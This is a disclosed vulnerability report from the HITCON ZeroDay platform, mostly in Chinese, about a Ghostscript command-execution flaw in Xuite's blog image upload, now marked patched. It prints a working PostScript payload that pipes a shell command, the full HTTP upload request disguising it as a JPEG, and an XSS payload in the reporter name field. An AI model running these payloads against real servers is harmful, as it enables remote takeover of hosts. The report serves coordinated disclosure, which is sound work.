Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-01188
- 發信 Vendor: 中華電信轉通報窗口(HiNet)
- Title: Xuite 可上傳 Ghostscript 圖片導致 Remote Code Execution
- Introduction: Remote Code Execution
處理狀態
目前狀態
公開
Last Update : 2018/12/08
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2018/08/23 04:48:46 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/24 00:08:26 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/08/24 18:19:11 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/08/24 18:19:11 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/10/23 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
- 2018/11/30 16:32:05 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/12/08 03:00:14 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-01188
- 通報者:morrow (<svg/onload=alert(1)>)
- 風險:嚴重
- 類型:遠端命令執行 (Remote Code Execution)
參考資料
攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://blog.xuite.net/ 後台,可上傳圖片的地方
敘述
step1.poc image
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%sleep 5) currentdevice putdevicepropsstep2. upload the image
POST /_helper/upload.php HTTP/1.1
Host: photo.xuite.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://img.xuite.net/xui/photoselector_iframe.html?stamp=2322465828
Content-Length: 1136
Content-Type: multipart/form-data; boundary=---------------------------17216519236092101831941000432
Origin: https://img.xuite.net
Connection: close
-----------------------------17216519236092101831941000432
Content-Disposition: form-data; name="album_id"
20323533
-----------------------------17216519236092101831941000432
Content-Disposition: form-data; name="session_id"
你的 session id
-----------------------------17216519236092101831941000432
Content-Disposition: form-data; name="resize"
1
-----------------------------17216519236092101831941000432
Content-Disposition: form-data; name="use_pic_title"
checked
-----------------------------17216519236092101831941000432
Content-Disposition: form-data; name="use_exif_rotate"
false
-----------------------------17216519236092101831941000432
Content-Disposition: form-data; name="t"
-----------------------------17216519236092101831941000432
Content-Disposition: form-data; name="Filedata"; filename="ps.jpg"
Content-Type: image/jpeg
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%sleep 5) currentdevice putdeviceprops
-----------------------------17216519236092101831941000432--發現不會有回顯,而且限制外網連線
使用 DNS 或者 sleep 10 進行測試,確認可以 RCE
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。